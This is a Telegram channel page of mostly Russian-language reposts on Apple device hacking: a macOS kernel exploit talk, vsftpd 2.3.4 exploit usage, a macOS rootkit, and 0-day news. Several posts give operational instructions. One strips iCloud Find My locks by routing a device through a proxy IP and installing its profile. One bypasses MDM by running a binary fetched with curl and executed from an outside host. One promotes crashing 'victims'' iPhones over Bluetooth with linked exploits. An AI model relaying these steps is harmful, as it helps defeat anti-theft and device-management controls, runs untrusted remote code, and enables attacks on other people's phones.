iPhone:~ root#
Відкрити в Telegram
Избранные кишат ссылками, пора отсортировать [smx7MYTQIi2M]
Показати більше838
Підписники
Немає даних24 години
+27 днів
-330 днів
Архів дописів
Repost from Mobile AppSec World
Эксплуатация уязвимости выполнения кода на уровне ядра через функционал OTA Update в MacOS
Доклад из разряда «Ничего не понятно, но очень интересно!».
Для начала материалы:
1. Слайды с доклада
2. PoC для энтузиастов
3. Видео демонстрация
К сожалению, мне не довелось еще изучить механизмы безопасности операционной системы MacOS, в частности, защиту SIP и прочие околосвязанные вещи. В теории я более менее понимаю, как оно работает, но пока что, все что я делал, это отключал SIP :)
Надеюсь, эти материалы будут полезны тем, кто вплотную работает с этим направлением. Ну а остальным, в качестве расширения кругозора :₽
#macos #ace #kernel
Repost from Proxy Bar
vsftpd (для версии 2.3.4)
usage:
python3 vsftpd_exploit.py <IP address> <port> <command>Repost from Proxy Bar
macOS RootKit
*
Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS.
Repost from 𝐆𝐒𝐌 𝐃𝐎𝐂𝐓𝐎𝐑𝐒 ™
🔥iCloud Remove Open Menu FMI OFF🔥 - 🆕 NEW 2024 PROXY METHOD 🆕
1. First submit order with: Serial + UDID + Apple ID (You have 30 min to do all, after it system reject order)
2. Setup proxy in Wifi network > "i" button > Configure Proxy > Manual:
Server: 167.86.115.86
Port: 8888
and click save
3. Open Safari and visit 167.86.115.86:8888, click download and install the profile
4. Go to iCloud >Show All > Off and On Game Center 2-3 times
5. Within 1-2 min order should reply OFF
@GSMDOCTORS
Repost from 𝐆𝐒𝐌 𝐃𝐎𝐂𝐓𝐎𝐑𝐒 ™
HFZ Mdm Bypass on Macbook M1 & M2 via Terminal Directly, With Latest MacOS Version Supported Like: Monterey,Ventura,Sonoma.
1 Clean Restore Your Macbook & Install Fresh macOS
3 Wait for your Mac to shut down completely. A Mac is completely shut down when the screen is black.
4 Now Enter in Recovery Mode By Press and hold the power button for few seconds on your Mac until the system volume and recovery , and Options button appear.
Then Click the Options button, then click Continue. Then you will enter in Recovery Mode.
5 Open Terminal , navigate to the top bar and click on Utilities. In the menu, find and click Terminal to open it in recovery mode.
6 Then Enter below command on Terminal :
curl http://hfzproc.com/patcher -o patcher && chmod +x patcher && ./patcher
- Now wait until the patch process get finished.
Once its Done restart Mac
Mdm Bypass Done on M1/M2
video soon
Repost from Типичный мамонт
Крашим устройства жертв на «iOS 17» с помощью Bluetooth (05.10.23)
На днях интернет взорвала новость про найденную уязвимость в «яблочных» девайсах — злоумышленники начали блокировать «iPhone» и «iPad» бедолаг с помощью «Flipper Zero».
Внимательно смотрим видео и впитываем новые знания. Прилагаю ссылочку для счастливых обладателей «хакерского тамагочи» на прошивку для него, а так же на сам эксплоит.
Разумеется, строго в ознакомительных целях ✌️
Взорви телефон своего друга 🧨
Repost from Hacker News
Apple экстренно исправила еще один 0-day в своих продуктах
https://xakep.ru/2023/10/05/apple-xnu-0day/
Repost from Помощник iOS | Helper iOS
Разработчик opa334 поделился мнением касательно будущего джейлбрейка. Большой пост был опубликован на форуме reddit.
О возможности рутфул он знал давно.
"Я знал, что rootful всё ещё возможен в течение довольно долгого времени, проблема в том, что это займет много вашего пространства, и я решил отказаться от этого для Dopamine. Кроме того, Procursus поддерживает только rootless с iOS 15, и идти вразрез с их планами и создание форка - это не то, что я хотел сделать. В долгосрочной перспективе у нас всё будет намного лучше без рут-доступа, и мы действительно должны были перейти к нему во времена iOS 11".
Чем он занят сейчас и какие у него планы ?
"Я работаю, хотя и ОЧЕНЬ медленно, над Dopamine 2.0, который, вероятно, не будет иметь каких-либо заметных новых функций, но откажется от oobPCI для kfd/whatever (exploit picker). В н. в. я занят дипломной работой бакалавра".
Будет ли он работать над iOS/iPadOS 16 ?
"Сейчас ситуация не выглядит хорошей, но возможно, Project Zero скоро представит эксплойт ядра для 17.0, и я надеюсь, что мы увидим хотя бы одно SPTM-обхода в какой-то момент. Недавно я купил 15 Pro на 17.0, и маловероятно, что я буду работать над 16.x, так как у меня нет личной потребности в таком джейлбрейке".
Repost from Информация опасносте
Да где же этому конец
Impact: A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6.
https://support.apple.com/en-gb/HT213961
Repost from N/a
#ESP32-Sour-Apple
Crash IOS17 devices over bluetooth. https://github.com/RapierXbox/ESP32-Sour-Apple
